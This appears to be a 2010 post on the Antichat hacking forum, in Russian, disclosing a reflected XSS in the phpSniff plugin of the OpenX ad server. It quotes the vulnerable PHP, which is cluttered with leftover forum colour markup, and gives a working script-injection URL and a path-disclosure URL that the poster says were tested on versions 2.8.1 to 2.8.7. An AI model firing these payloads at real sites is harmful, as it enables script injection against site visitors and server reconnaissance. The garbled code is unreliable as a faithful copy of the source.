20.10.2010, 14:08
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
С нами:
9000386
Репутация:
1148
|
|
pXSS
/plugins/deliveryLimitations/Client/lib/phpSniff/index.php
PHP код:
[COLOR="#000000"]/*...*/
require_once('phpSniff.class.php');
require_once('phpTimer.class.php');
/*...*/
$sniffer_settings = array('check_cookies'=>$GET_VARS['cc'],
'default_language'=>$GET_VARS['dl'],
'allow_masquerading'=>$GET_VARS['am']);
$client =& new phpSniff($GET_VARS['UA'],$sniffer_settings);
/*...*/
[/COLOR]">ua
[/COLOR]">[COLOR="#0000BB"][/COLOR][COLOR="#0000BB"]get_property[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'ua'[/COLOR][COLOR="#007700"]);[/COLOR][COLOR="#0000BB"]?>[/COLOR]
/*...*/[/COLOR]
/plugins/deliveryLimitations/Client/lib/phpSniff/phpSniff.class.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#FF8000"]/*...*/
[/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]phpSniff[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$UA[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$settings[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#FF8000"]/*..*/
[/COLOR][COLOR="#007700"]if(empty([/COLOR][COLOR="#0000BB"]$UA[/COLOR][COLOR="#007700"])) return[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_set_browser[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'ua'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$UA[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]$run[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]init[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#FF8000"]/*...*/
[/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]property[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$p[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]null[/COLOR][COLOR="#007700"])
{ if([/COLOR][COLOR="#0000BB"]$p[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]null[/COLOR][COLOR="#007700"])
{ return[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_browser_info[/COLOR][COLOR="#007700"];
}
else
{ return[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_browser_info[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]strtolower[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$p[/COLOR][COLOR="#007700"])];
}
}
[/COLOR][COLOR="#FF8000"]/*...*/
[/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]_set_browser[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$k[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$v[/COLOR][COLOR="#007700"])
{[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_browser_info[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]strtolower[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$k[/COLOR][COLOR="#007700"])] =[/COLOR][COLOR="#0000BB"]strtolower[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$v[/COLOR][COLOR="#007700"]);
}
[/COLOR][COLOR="#FF8000"]/*...*/
[/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]get_property[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$p[/COLOR][COLOR="#007700"])
{ return[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]property[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$p[/COLOR][COLOR="#007700"]);
}
[/COLOR][COLOR="#FF8000"]/*...*/[/COLOR][/COLOR]
Код:
PoC
http://[host]/[path]/plugins/deliveryLimitations/Client/lib/phpSniff/index.php?UA=%3Cscript%3Ealert%28123%29%3C/script%3E
Проверил на OpenX 2.8.1, 2.8.2, 2.8.3, 2.8.4, 2.8.6, 2.8.7.
Path disclosure
условия -> никаких
на данный момент на последней ветке 2.8.7 что нашел --> работает
Код:
PoC http://[host]/[path]/www/admin/plugins/openXWorkflow/application/bootstrap.php
|
|
|